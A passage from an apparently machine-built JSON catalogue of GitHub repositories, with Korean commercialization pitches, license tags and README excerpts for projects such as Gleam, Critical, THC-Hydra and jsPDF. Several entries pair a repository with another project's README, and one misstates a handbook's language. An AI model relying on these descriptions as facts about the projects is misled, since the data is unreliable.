Card](https://goreportcard.com/badge/github.com/chrislusf/gleam)](https://goreportcard.com/report/github.com/chrislusf/gleam)\n[![codecov](https://codecov.io/gh/chrislusf/gleam/branch/master/graph/badge.svg)](https://codecov.io/gh/chrislusf/gleam)\n\nGleam is a high performance and efficient distributed execution system, and also\nsimple, generic, flexible and easy to customize.\n\nGleam is built in Go, and the user defined computation can be written in Go, \nUnix pipe tools, or any streaming programs.\n\n### High Performance\n\n* Pure Go mappers and reducers have high performance and concurrency.\n* Data flows through memory, optionally to disk","composite_score":0.2159,"license_safety_tag":"safe"},{"name":"addyosmani/critical","github_url":"https://github.com/addyosmani/critical","stars":9,"language":"JavaScript","license":"Apache-2.0","abandonment_months":0,"description":"# Critical 저장소 분석 보고서\n\n## 왜 보물인가\n웹사이트 초기 로딩 속도를 획기적으로 개선해주는 도구로, 온라인 사업의 매출 증대에 직결되는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **웹사이트 성능 최적화 SaaS**: 기업 홈페이지의 로딩 속도를 자동으로 분석하고 개선 방법을 제시하는 구독 서비스\n2. **개발사 내부 도구**: 소프","readme_excerpt":"[![NPM version][npm-image]][npm-url] [![Build Status][ci-image]][ci-url] [![Coverage][coveralls-image]][coveralls-url]\n\n# critical\n\nCritical extracts & inlines critical-path (above-the-fold) CSS from HTML\n\n<img src=\"https://raw.githubusercontent.com/addyosmani/critical/master/preview.png\" alt=\"Preview\" width=\"378\">\n\n## Install\n\n```sh\npnpm add -D critical\n```\n\n## Build plugins\n\n- [grunt-critical](https://github.com/bezoerb/grunt-critical)\n- Gulp users should use Critical directly\n- For Webpack use [html-critical-webpack-plugin](https://github.com/anthonygore/html-critical-webpack-plugin)\n\n## Demo projects\n\n- [Optimize a basic page with Gulp](https://github.com/addyosmani/critical-path-css-demo) with a [tutorial](https://github.com/addyosmani/critical-path-css-demo#tutorial)\n- [Optimize an Angular boilerplate with Gulp](https://github.com/addyosmani/critical-path-angular-demo)\n- [Optimize a Weather app with Gulp](https://github.com/addyosmani/critical-css-weather-app)\n\n## Usage\n\nInclude:","composite_score":0.2159,"license_safety_tag":"safe"},{"name":"fossasia/wp-juiz-last-tweet-widget","github_url":"https://github.com/fossasia/wp-juiz-last-tweet-widget","stars":11,"language":"Python","license":"Apache-2.0","abandonment_months":0,"description":"# fossasia/wp-juiz-last-tweet-widget 분석\n\n## 왜 보물인가\nWordPress 블로그에 트위터 최신 글을 자동으로 표시해주는 도구로, 소셜 미디어 관리를 간편하게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n1. **블로그 플랫폼 SaaS**: WordPress 기반 블로깅 서비스에 트위터 연동 기능을 내장 기능으로 제공\n2. *","readme_excerpt":"eventyay-tickets (ENext)\n========================\n\nProject status & release cycle\n------------------------------\n\nWelcome to the **Eventyay** project! The ticketing component of the system provides options for **ticket sales and event-related items** such as T-shirts. Eventyay has been in development since **2014**. Its ticketing component is based on a fork of **Pretix**.\n\nENext is the new and updated version of Eventyay with a unified codebase for the Tickets, Talk, and Videos components.\n\nGetting Started\n---------------\n\nPython-based development\n------------------------------------------------------------\n\n0. **Clone the repository**:\n\n.. code-block:: bash\n\n  git clone https://github.com/fossasia/eventyay.git\n\n1. **Install external dependencies**:\n\nThe *deb-packages.txt* file lists Debian packages we need to install.\nIf you are using Debian / Ubuntu, you can install them quickly with this command:\n\nFor traditional shell:\n\n.. code-block:: bash\n\n  $ xargs -a deb-packages.txt sudo apt ","composite_score":0.2158,"license_safety_tag":"safe"},{"name":"AgeFades/AgeFades-Note","github_url":"https://github.com/AgeFades/AgeFades-Note","stars":10,"language":"","license":"Apache-2.0","abandonment_months":11,"description":"# AgeFades-Note 보물 분석\n\n## 왜 보물인가\n개인 노트를 정리하고 검색할 수 있는 간단한 도구로, 많은 사람들이 필요로 하는 기본적이면서도 핵심적인 기능을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독 방식의 개인 노트 저장소로, 클라우드에 자동 동기화되는 유료 서비스\n2. **내부 업무 도구**: 회사 직원들","readme_excerpt":"[TOC]\n\n# AgeFades-Note\n\n## 概述\n\n- 天行健，君子以自强不息\n- 只有不断的学习才能不被时代淘汰。\n- 记录AgeFades 成长历程。\n\n\n\nREADME中目录是用Java程序根据相对路径生成的，在Typora中都是可点击的跳转链接，在Github页面中不知道为什么有些是，有些不是。主要用于下载后的跳转。\n\n<a href=\"https://md5.cc\">md5解密</a >\n\n\n\n## 工作经验积累输出文档\n\n[Redis bitmap 实现签到](工作经验积累输出文档/Redis bitmap 实现签到.md)\n\n[Linux 基础开发环境搭建](工作经验积累输出文档/Linux 基础开发环境搭建.md)\n\n[认证鉴权流程](工作经验积累输出文档/认证鉴权流程.md)\n\n[技术分享 - 微服务日志体系](工作经验积累输出文档/技术分享 - 微服务日志体系.md)\n\n[Mac M1安装虚拟机](工作经验积累输出文档/Mac M1安装虚拟机.md)\n\n[Redis Lua实现限流(防表单重复提交)](工作经验积累输出文档/Redis Lua实现限流(防表单重复提交).md)\n\n[Redisson](工作经验积累输出文档/Redisson.md)\n\n[Sentry](工作经验积累输出文档/Sentry.md)\n\n[Git目录账号信息配置](工作经验积累输出文档/Git目录账号信息配置.md)\n\n[Minio大文件分片上传、断点续传、秒传](工作经验积累输出文档/Minio大文件分片上传、断点续传、秒传.md)\n\n[Liquibase数据库版本控制](工作经验积累输出文档/Liquibase数据库版本控制.md)\n\n[技术分享 - SpringCloud灰度发布方案](工作经验积累输出文档/技术分享 - SpringCloud灰度发布方案.md)\n\n[AI接口对接及SSEEmitter](工作经验积累输出文档/AI接口对接及SSEEmitter.md)\n\n[Oracle 相关文档](工作经验积累输出文档/Oracle 相关文档.md)\n\n[多租户物理分库实际案例](工作经验积累输出文档/多租户物理分库实际案例.md)\n\n[Knife4j](工作经验积累输出文档/Knife4j.md)\n\n[MySQL 设计基础约定](工作经验积累输出文档/","composite_score":0.2157,"license_safety_tag":"safe"},{"name":"chirag-droid/animeflix","github_url":"https://github.com/chirag-droid/animeflix","stars":42,"language":"TypeScript","license":"AGPL-3.0","abandonment_months":6,"description":"# Animeflix 상용화 분석 보고서\n\n## 왜 보물인가\n애니메이션 팬들이 여러 플랫폼을 돌아다니지 않고 한곳에서 원하는 애니메이션을 찾고 볼 수 있는 통합 플랫폼이기 때문입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독료를 받고 광고 없는 애니메이션 스트리밍 서비스로 운영\n2. **API 판매**: 다른 동영상 앱 개발사에게 ","readme_excerpt":"<!-- PROJECT LOGO -->\n<p align=\"center\">\n  <div align=\"center\">\n    <a href=\"https://github.com/chirag-droid/animeflix\">\n      <img src=\"https://aniflix.pro/favicon.ico\" alt=\"Logo\">\n    </a>\n    <h3>Animeflix - Watch animes online</h3>\n    <!-- REPOSITORY INFO BADGES -->\n    <a href=\"https://discord.gg/4UPU8etvae\">\n      <img src=\"https://img.shields.io/discord/971304939525644298?label=discord&logo=discord&color=5460e6&style=flat-square&labelColor=2b2f35\">\n    </a>\n    <a href=\"https://www.gnu.org/licenses/agpl-3.0.en.html\">\n      <img src=\"https://img.shields.io/github/license/chirag-droid/animeflix?logo=gnu&color=a32d2a&labelColor=333&logoColor=fff&style=flat-square\">\n    </a>\n    <a href=\"https://github.com/chirag-droid/animeflix/stargazers\">\n      <img src=\"https://img.shields.io/github/stars/chirag-droid/animeflix?style=flat-square\" alt=\"Github Stars\">\n    </a>\n    <a href=\"https://github.com/chirag-droid/issues\">\n      <img src=\"https://img.shields.io/github/issues/chirag-droid/a","composite_score":0.2154,"license_safety_tag":"risky"},{"name":"fossasia/2009.fossasia.org","github_url":"https://github.com/fossasia/2009.fossasia.org","stars":11,"language":"Prolog","license":"Apache-2.0","abandonment_months":1,"description":"# fossasia/2009.fossasia.org 평가 보고서\n\n## 왜 보물인가\n2009년 FOSSASIA 행사의 공식 웹사이트로, 오픈소스 커뮤니티의 역사적 자산이자 이벤트 운영 노하우를 담은 레퍼런스입니다.\n\n## 어디에 쓸 수 있나\n\n1. **컨퍼런스 플랫폼 SaaS**: 기술 행사나 학회를 위한 웹사이트 템플릿 서비스로 판매\n2. **커뮤니티 사","readme_excerpt":"# PSLab Grove Shield\n\nThe Grove shield for the [Pocket Science Lab](https://pslab.io).\n\n[![Mailing List](https://img.shields.io/badge/Mailing%20List-FOSSASIA-blue.svg)](https://groups.google.com/forum/#!forum/pslab-fossasia)\n\nThis repository hosts the schematics of the Grove Shield for the Pocket Science Lab open hardware platform (PSLab).\n\nThe goal of PSLab is to create an Open Source hardware device (open on all layers) and software applications that can be used for experiments by teachers, students and scientists. Our tiny pocket lab provides an array of instruments for doing science and engineering experiments. It provides functions of numerous measurement tools including an oscilloscope, a waveform generator, a frequency counter, a programmable voltage, current source and even a component to control robots with up to four servos. The website is at: https://pslab.io\n\nThe Grove open hardware project was started by Seeed Studio. The goal is to make it easier to connect, experiment, a","composite_score":0.2153,"license_safety_tag":"safe"},{"name":"blocks/blocks","github_url":"https://github.com/blocks/blocks","stars":101,"language":"JavaScript","license":"MIT","abandonment_months":0,"description":"","readme_excerpt":"<img\n  src=\"https://user-images.githubusercontent.com/1424573/61592179-e0fda080-ab8c-11e9-9109-166cc7c86b43.png\"\n  alt=\"blocks logo\"\n  width=\"80\"\n/>\n\n# Blocks (alpha)\n\nA JSX-based page builder for creating beautiful websites without writing code.\n\n![Blocks demo](https://user-images.githubusercontent.com/1424573/69644337-c13a2580-1021-11ea-8c76-379386372db1.gif)\n\n\n[Read the docs &rarr;](https://blocks-ui.com/docs)\n\n---\n\n> Blocks is in **very early alpha** so many features are missing and it's not yet fully functional.\n","composite_score":0.2151,"license_safety_tag":"safe"},{"name":"krassowski/jupyter-manim","github_url":"https://github.com/krassowski/jupyter-manim","stars":5,"language":"Python","license":"MIT","abandonment_months":1,"description":"# jupyter-manim 분석 리포트\n\n## 왜 보물인가\n수학과 과학 개념을 화려한 애니메이션으로 자동 변환해주는 도구로, 교육 콘텐츠 제작 시간을 대폭 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼 (SaaS)**: 수학, 물리 강의 영상을 자동으로 생성하고 판매하는 구독 서비스\n2. **대학 강의 보조 도구 (내부 업","readme_excerpt":"# jupyter-manim\n[![Build Status](https://travis-ci.org/krassowski/jupyter-manim.svg?branch=master)](https://travis-ci.org/krassowski/jupyter-manim)\n[![codecov](https://codecov.io/gh/krassowski/jupyter-manim/branch/master/graph/badge.svg)](https://codecov.io/gh/krassowski/jupyter-manim)\n[![MIT License](https://img.shields.io/badge/license-MIT-blue.svg?style=flat)](http://choosealicense.com/licenses/mit/)\n[![Binder](https://mybinder.org/badge_logo.svg)](https://mybinder.org/v2/gh/krassowski/jupyter-manim/master?filepath=Example.ipynb)\n[![Colab](https://camo.githubusercontent.com/52feade06f2fecbf006889a904d221e6a730c194/68747470733a2f2f636f6c61622e72657365617263682e676f6f676c652e636f6d2f6173736574732f636f6c61622d62616467652e737667)](https://colab.research.google.com/gist/cjds/825d9acc80cb0b92bb877bbe2f468d70/example-jupyter-manim.ipynb)\n\nIntegrates 3b1b's [ManimCairo](https://github.com/3b1b/manim) (cairo-backend branch)\nwith Jupyter displaying the resulting video when using `%%manim` cel","composite_score":0.2149,"license_safety_tag":"safe"},{"name":"rootsongjc/kubernetes-handbook","github_url":"https://github.com/rootsongjc/kubernetes-handbook","stars":5,"language":"Mermaid","license":"unknown","abandonment_months":5,"description":"# Kubernetes Handbook 분석\n\n## 왜 보물인가\n클라우드 컴퓨팅의 핵심 기술인 쿠버네티스를 한국어로 체계적으로 설명한 실전 학습 자료로, 국내 기업들의 클라우드 전환을 돕는 귀중한 교육 리소스입니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 교육 플랫폼**: 시니어 개발자를 위한 쿠버네티스 심화 과정 강의 콘텐츠로 판매\n2. **기업 내","readme_excerpt":"# Kubernetes 手册\n\n[![GitHub stars](https://img.shields.io/github/stars/rootsongjc/kubernetes-handbook.svg)](https://github.com/rootsongjc/kubernetes-handbook/stargazers)\n[![GitHub forks](https://img.shields.io/github/forks/rootsongjc/kubernetes-handbook.svg)](https://github.com/rootsongjc/kubernetes-handbook/network)\n[![License](https://img.shields.io/badge/License-CC%20BY--NC--SA%204.0-lightgrey.svg)](https://creativecommons.org/licenses/by-nc-sa/4.0/)\n\n> Kubernetes 基础教程 - 全面介绍容器编排技术的实战手册，涵盖核心架构、关键组件和实际应用。\n\n## 关于本教程\n\n本教程内容涵盖容器、Kubernetes、服务网格、Serverless 等云原生的多个领域，以及 AI 原生基础设施。\n\n本书采用[署名 - 非商业性使用 - 相同方式共享 4.0 (CC BY-NC-SA 4.0)](https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh) 协议共享。\n\n## 什么是云原生\n\n云原生是一种行为方式和设计理念，其本质是通过一系列技术和方法论来提高云上资源利用率和应用交付效率。云计算的发展史就是一部云原生化的历史。\n\n从技术发展历程来看：\n\n- **Kubernetes** 开启了云原生的序幕，提供了容器编排的标准\n- **服务网格（如 Istio）** 引领了后 Kubernetes 时代的微服务治理\n- **Serverless** 技术使云原生从基础设施层向应用架构层深入发展\n- **AI 原生** 技术使云原生从应用架构层向智能化平台发展\n\n我们正处于一个云原生技术快速演进的新时代。\n\n## Kubernetes 简介\n\n[Kubernet","composite_score":0.2149,"license_safety_tag":"unknown"},{"name":"mofa-org/mofa","github_url":"https://github.com/mofa-org/mofa","stars":289,"language":"Rust","license":"Apache-2.0","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.2148,"license_safety_tag":"safe"},{"name":"bluss/ordermap","github_url":"https://github.com/bluss/ordermap","stars":10,"language":"Rust","license":"Apache-2.0","abandonment_months":1,"description":"# OrderMap 저장소 분석\n\n## 왜 보물인가\n데이터를 입력된 순서대로 정렬된 상태로 관리할 수 있는 효율적인 도구로, 데이터 정렬 작업이 많은 서비스에서 성능을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **실시간 대시보드**: 사용자가 추가한 항목들을 입력 순서대로 표시하는 분석 대시보드 서비스\n- **주문 관리 시스템**: 온라인","readme_excerpt":"# indexmap\n\n[![build status](https://github.com/indexmap-rs/indexmap/actions/workflows/ci.yml/badge.svg?branch=main)](https://github.com/indexmap-rs/indexmap/actions)\n[![crates.io](https://img.shields.io/crates/v/indexmap.svg)](https://crates.io/crates/indexmap)\n[![docs](https://docs.rs/indexmap/badge.svg)](https://docs.rs/indexmap)\n[![rustc](https://img.shields.io/badge/rust-1.85%2B-orange.svg)](https://img.shields.io/badge/rust-1.85%2B-orange.svg)\n\nA pure-Rust hash table which preserves (in a limited sense) insertion order.\n\nThis crate implements compact map and set data-structures,\nwhere the iteration order of the keys is independent from their hash or\nvalue. It preserves insertion order (except after removals), and it\nallows lookup of entries by either hash table key or numerical index.\n\nNote: this crate was originally released under the name `ordermap`,\nbut it was renamed to `indexmap` to better reflect its features.\nThe [`ordermap`](https://crates.io/crates/ordermap) crate now ex","composite_score":0.2147,"license_safety_tag":"safe"},{"name":"buildpack/pack","github_url":"https://github.com/buildpack/pack","stars":5,"language":"Go","license":"Apache-2.0","abandonment_months":0,"description":"# buildpack/pack 오픈소스 프로젝트 분석\n\n## 왜 보물인가\n애플리케이션을 패키징하는 복잡한 과정을 자동화하여, 개발자들이 번거로운 설정 없이 앱을 빠르게 배포할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업 고객들이 자신의 앱을 쉽게 클라우드에 올릴 수 있는 플랫폼으로 제공\n2. **내부 업무 도구**: 개","readme_excerpt":"# pack - Buildpack CLI\n\n[![Build results](https://github.com/buildpacks/pack/workflows/build/badge.svg)](https://github.com/buildpacks/pack/actions)\n[![Go Report Card](https://goreportcard.com/badge/github.com/buildpacks/pack)](https://goreportcard.com/report/github.com/buildpacks/pack)\n[![codecov](https://codecov.io/gh/buildpacks/pack/branch/main/graph/badge.svg)](https://codecov.io/gh/buildpacks/pack)\n[![GoDoc](https://godoc.org/github.com/buildpacks/pack?status.svg)](https://godoc.org/github.com/buildpacks/pack)\n[![GitHub license](https://img.shields.io/github/license/buildpacks/pack)](https://github.com/buildpacks/pack/blob/main/LICENSE)\n[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/4748/badge)](https://bestpractices.coreinfrastructure.org/projects/4748)\n[![Slack](https://img.shields.io/badge/slack-join-ff69b4.svg?logo=slack)](https://slack.cncf.io/)\n[![Gitpod ready-to-code](https://img.shields.io/badge/Gitpod-ready--to--code-blue?logo=gitpod)](https:","composite_score":0.2144,"license_safety_tag":"safe"},{"name":"ericmjl/pyjanitor","github_url":"https://github.com/ericmjl/pyjanitor","stars":9,"language":"Python","license":"MIT","abandonment_months":1,"description":"# PyJanitor 상용화 분석\n\n## 왜 보물인가\n엑셀이나 CSV 파일처럼 복잡하게 흩어져 있는 데이터를 자동으로 정리해주는 도구로, 회사의 데이터 정리 업무 시간을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 중소기업 대상 '클라우드 데이터 정리 플랫폼'으로 제공 - 복잡한 엑셀 파일을 드래그하면 자동 정리","readme_excerpt":"# pyjanitor\n\n[![Binder](https://mybinder.org/badge_logo.svg)](https://mybinder.org/v2/gh/ericmjl/pyjanitor/dev)\n\n<!-- pypi-doc -->\n`pyjanitor` is a Python implementation of the R package [`janitor`][janitor].\nIt provides a clean user-friendly API for extending pandas\nwith powerful and readable data-cleaning functions.\n\n[janitor]: https://github.com/sfirke/janitor\n\n## Quick start\n\n- Installation: `conda install -c conda-forge pyjanitor`.\n  Read more [installation instructions](#installation).\n- Check out the collection of [general functions][funcs].\n\n[funcs]: https://pyjanitor-devs.github.io/pyjanitor/api/functions/\n\n## Why janitor?\n\nOriginally a port of the R package,\n`pyjanitor` has evolved from a set of convenient data cleaning routines\ninto an experiment with the [`method chaining`][mc] paradigm.\n\n[mc]: https://towardsdatascience.com/the-unreasonable-effectiveness-of-method-chaining-in-pandas-15c2109e3c69\n\nData preprocessing usually consists of a series of steps\nthat involve transfo","composite_score":0.2142,"license_safety_tag":"safe"},{"name":"vanhauser-thc/thc-hydra","github_url":"https://github.com/vanhauser-thc/thc-hydra","stars":5,"language":"C","license":"agpl-3.0","abandonment_months":0,"description":"# THC-Hydra 상용화 분석 보고서\n\n## 왜 보물인가\n\n자동으로 시스템의 약한 부분을 찾아내는 보안 검사 도구로, 은행·정부·기업 등 모든 조직이 해킹으로부터 자신을 지켜야 하기 때문에 수요가 절대 줄어들지 않습니다.\n\n## 어디에 쓸 수 있나\n\n**SaaS 서비스**: 중소기업을 위한 월간 보안 진단 자동화 플랫폼 - 클릭 몇 번으로 자신의 시스템","readme_excerpt":"\n\t\t\t\t  H Y D R A\n\n                      (c) 2001-2023 by van Hauser / THC\n             <vh@thc.org> https://github.com/vanhauser-thc/thc-hydra\n       Many modules were written by David (dot) Maciejak @ gmail (dot) com\n                 BFG code by Jan Dlabal <dlabaljan@gmail.com>\n\n  \t\t    Licensed under AGPLv3 (see LICENSE file)\n\n           Please do not use in military or secret service organizations,\n                          or for illegal purposes.\n      (This is the wish of the author and non-binding. Many people working\n       in these organizations do not care for laws and ethics anyway.\n            You are not one of the \"good\" ones if you ignore this.)\n\n           NOTE: No, this is not meant to be a markdown doc! old school!\n\n\nHydra in the most current GitHub state can be directly downloaded via Docker:\n```\ndocker pull vanhauser/hydra\n```\n\n\nINTRODUCTION\n------------\nNumber one of the biggest security holes are passwords, as every password\nsecurity study shows.\nThis tool is a pr","composite_score":0.2141,"license_safety_tag":"risky"},{"name":"jashkenas/underscore","github_url":"https://github.com/jashkenas/underscore","stars":5,"language":"JavaScript","license":"mit","abandonment_months":1,"description":"# Underscore 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱을 만들 때 반복되는 작업들을 자동화해주는 도구로, 개발자의 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 데이터 처리 기능이 필요한 웹 기반 업무 도구(예: 엑셀 같은 온라인 스프레드시트)에 핵심 기능으로 탑재\n- **내부 업무 도구**: 회사 ","readme_excerpt":"                       __\n                      /\\ \\                                                         __\n     __  __    ___    \\_\\ \\     __   _ __   ____    ___    ___   _ __    __       /\\_\\    ____\n    /\\ \\/\\ \\ /' _ `\\  /'_  \\  /'__`\\/\\  __\\/ ,__\\  / ___\\ / __`\\/\\  __\\/'__`\\     \\/\\ \\  /',__\\\n    \\ \\ \\_\\ \\/\\ \\/\\ \\/\\ \\ \\ \\/\\  __/\\ \\ \\//\\__, `\\/\\ \\__//\\ \\ \\ \\ \\ \\//\\  __/  __  \\ \\ \\/\\__, `\\\n     \\ \\____/\\ \\_\\ \\_\\ \\___,_\\ \\____\\\\ \\_\\\\/\\____/\\ \\____\\ \\____/\\ \\_\\\\ \\____\\/\\_\\ _\\ \\ \\/\\____/\n      \\/___/  \\/_/\\/_/\\/__,_ /\\/____/ \\/_/ \\/___/  \\/____/\\/___/  \\/_/ \\/____/\\/_//\\ \\_\\ \\/___/\n                                                                                  \\ \\____/\n                                                                                   \\/___/\n\nUnderscore.js is a utility-belt library for JavaScript that provides\nsupport for the usual functional suspects (each, map, reduce, filter...)\nwithout extending any core JavaScript objects.\n\nFor Docs, License, Tests, and pre-p","composite_score":0.214,"license_safety_tag":"safe"},{"name":"Geal/nom","github_url":"https://github.com/Geal/nom","stars":6,"language":"Rust","license":"mit","abandonment_months":9,"description":"# Geal/nom 저장소 분석\n\n## 왜 보물인가\n복잡한 데이터 형식을 자동으로 읽고 해석하는 기술로, 기업들이 수작업으로 하던 데이터 처리를 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객이 업로드한 각종 문서(청구서, 계약서)를 자동 분석하여 정보를 추출하고 정리해주는 웹 서비스\n2. **내부 업무 도구**: 대량","readme_excerpt":"# nom, eating data byte by byte\n\n[![LICENSE](https://img.shields.io/badge/license-MIT-blue.svg)](LICENSE)\n[![Join the chat at https://gitter.im/Geal/nom](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/Geal/nom?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n[![Build Status](https://github.com/rust-bakery/nom/actions/workflows/ci.yml/badge.svg)](https://github.com/rust-bakery/nom/actions/workflows/ci.yml)\n[![Coverage Status](https://coveralls.io/repos/github/rust-bakery/nom/badge.svg?branch=main)](https://coveralls.io/github/rust-bakery/nom?branch=main)\n[![crates.io Version](https://img.shields.io/crates/v/nom.svg)](https://crates.io/crates/nom)\n[![Minimum rustc version](https://img.shields.io/badge/rustc-1.65.0+-lightgray.svg)](#rust-version-requirements-msrv)\n\nnom is a parser combinators library written in Rust. Its goal is to provide tools\nto build safe parsers without compromising the speed or memory consumption. To\nthat end, it uses extensiv","composite_score":0.214,"license_safety_tag":"safe"},{"name":"h2pl/Java-Tutorial","github_url":"https://github.com/h2pl/Java-Tutorial","stars":6,"language":"Java","license":"unknown","abandonment_months":12,"description":"# Java-Tutorial 상용화 분석\n\n## 왜 보물인가\n자바 프로그래밍을 배우고 싶은 초보자들을 위한 체계적인 학습 자료로, 프로그래밍 교육 시장의 수요를 충족할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼 SaaS**: 유데미, 코세라 같은 강의 플랫폼에서 자바 기초 과정으로 판매\n2. **기업 내부 교육 도구**: 신입 ","readme_excerpt":"<div align=\"center\">\n<a href=\"https://github.com/h2pl/Java-Tutorial\">\n    <img src=\"https://java-tutorial.oss-cn-shanghai.aliyuncs.com/Javatutorial-v1.png\" width=\"300\" height=\"300\"/>\n</a>\n</div>\n\n<p>\n<div align=\"center\">\n    <a href=\"https://github.com/h2pl/Java-Tutorial\"><img src=\"https://img.shields.io/github/stars/h2pl/JavaTutorial.svg\"></a>\n    <a href=\"https://github.com/h2pl/Java-Tutorial\"><img src=\"https://img.shields.io/github/forks/h2pl/JavaTutorial.svg\"></a>\n    <a href=\"https://github.com/h2pl/Java-Tutorial\"><img src=\"https://img.shields.io/github/issues/h2pl/JavaTutorial.svg\"></a>\n    <a href=\"https://github.com/h2pl/Java-Tutorial\"><img src=\"https://img.shields.io/github/license/h2pl/JavaTutorial.svg\"></a>\n    <a href=\"https://github.com/h2pl/Java-Tutorial\"><img src=\"https://img.shields.io/github/last-commit/h2pl/JavaTutorial.svg\"></a>\n    <a href=\"https://github.com/h2pl/Java-Tutorial\"><img src=\"https://img.shields.io/github/release/h2pl/JavaTutorial.svg\"></a>\n</div>\n</p>\n","composite_score":0.2139,"license_safety_tag":"unknown"},{"name":"webrtc/samples","github_url":"https://github.com/webrtc/samples","stars":5,"language":"JavaScript","license":"bsd-3-clause","abandonment_months":1,"description":"# webrtc/samples 분석 보고서\n\n## 왜 보물인가\n실시간 영상·음성 통화 기술의 작동 원리를 배울 수 있는 무료 교육 자료로, 개발자들이 화상회의나 라이브 스트리밍 서비스를 만들 때 참고할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **화상회의 SaaS**: Zoom이나 Google Meet 같은 원격 회의 플랫폼을 개발할 때 필수 기술로 ","readme_excerpt":"# WebRTC Code Samples\n\nThis is a repository for the WebRTC JavaScript code samples. All of the samples can be tested from [webrtc.github.io/samples](https://webrtc.github.io/samples).\n\nTo run the samples locally\n```\nnpm install && npm start\n```\nand open your browser on the page indicated.\n\n## Contributing\nWe welcome contributions and bugfixes. Please see [CONTRIBUTING.md](https://github.com/webrtc/samples/blob/gh-pages/CONTRIBUTING.md) for details.\n\n## Bugs\n\nIf you encounter a bug or problem with one of the samples, please submit a\n[new issue](https://github.com/webrtc/samples/issues/new) so we know about it and can fix it.\n\nPlease avoid submitting issues on this repository for general problems you have with WebRTC. If you have found a bug in\nthe WebRTC APIs, please see [webrtc.org/bugs](https://webrtc.org/support/bug-reporting) for how to submit bugs on the affected browsers.\nIf you need support on how to implement your own WebRTC-based application, please see the\n[discuss-webrtc](htt","composite_score":0.2137,"license_safety_tag":"safe"},{"name":"solana-foundation/kora","github_url":"https://github.com/solana-foundation/kora","stars":178,"language":"Rust","license":"MIT","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.2137,"license_safety_tag":"safe"},{"name":"rs/SDWebImage","github_url":"https://github.com/rs/SDWebImage","stars":11,"language":"Objective-C","license":"mit","abandonment_months":1,"description":"# SDWebImage 저장소 분석\n\n## 왜 보물인가\n스마트폰 앱에서 인터넷 이미지를 빠르고 효율적으로 보여주는 필수 기술로, 수백만 명이 사용하는 앱들의 기초가 되고 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소셜미디어, 이커머스 플랫폼에서 상품 이미지를 빠르게 로딩하는 서비스\n- **내부 업무 도구**: 모바일 앱 개발사가 자사","readme_excerpt":"<p align=\"center\" >\n  <img src=\"https://raw.githubusercontent.com/SDWebImage/SDWebImage/master/SDWebImage_logo.png\" title=\"SDWebImage logo\" float=left>\n</p>\n\n\n[![Build Status](https://github.com/SDWebImage/SDWebImage/actions/workflows/CI.yml/badge.svg)](https://github.com/SDWebImage/SDWebImage/actions/workflows/CI.yml)\n[![Pod Version](http://img.shields.io/cocoapods/v/SDWebImage.svg?style=flat)](http://cocoadocs.org/docsets/SDWebImage/)\n[![Pod Platform](http://img.shields.io/cocoapods/p/SDWebImage.svg?style=flat)](http://cocoadocs.org/docsets/SDWebImage/)\n[![Pod License](http://img.shields.io/cocoapods/l/SDWebImage.svg?style=flat)](https://www.apache.org/licenses/LICENSE-2.0.html)\n[![Carthage compatible](https://img.shields.io/badge/Carthage-compatible-brightgreen.svg)](https://github.com/SDWebImage/SDWebImage)\n[![SwiftPM compatible](https://img.shields.io/badge/SwiftPM-compatible-brightgreen.svg)](https://swift.org/package-manager/)\n[![Mac Catalyst compatible](https://img.shields.io/b","composite_score":0.2136,"license_safety_tag":"safe"},{"name":"MrRio/jsPDF","github_url":"https://github.com/MrRio/jsPDF","stars":7,"language":"JavaScript","license":"mit","abandonment_months":1,"description":"# jsPDF 저장소 분석\n\n## 왜 보물인가\n웹에서 작성한 문서를 PDF 파일로 바꿔주는 도구로, 온라인 송장 발급, 청구서 생성, 보고서 다운로드 등 비즈니스에서 매우 자주 필요한 기능입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 회계 솔루션이 청구서를 PDF로 자동 생성하거나, HR 플랫폼이 급여명세서를 PDF로 제공하는 경우\n2","readme_excerpt":"# ![jsPDF](https://parall.ax/parallax-2016/img/svg/jspdf-logo.svg)\n\n[![Continous Integration](https://github.com/MrRio/jsPDF/actions/workflows/continuous-integration.yml/badge.svg)](https://github.com/MrRio/jsPDF/actions/workflows/continuous-integration.yml?query=branch%3Amaster)\n[![Code Climate](https://codeclimate.com/repos/57f943855cdc43705e00592f/badges/2665cddeba042dc5191f/gpa.svg)](https://codeclimate.com/repos/57f943855cdc43705e00592f/feed)\n[![Test Coverage](https://codeclimate.com/repos/57f943855cdc43705e00592f/badges/2665cddeba042dc5191f/coverage.svg)](https://codeclimate.com/repos/57f943855cdc43705e00592f/coverage)\n[![GitHub license](https://img.shields.io/github/license/MrRio/jsPDF.svg)](https://github.com/MrRio/jsPDF/blob/master/LICENSE)\n[![Total alerts](https://img.shields.io/lgtm/alerts/g/MrRio/jsPDF.svg?logo=lgtm&logoWidth=18)](https://lgtm.com/projects/g/MrRio/jsPDF/alerts/)\n[![Language grade: 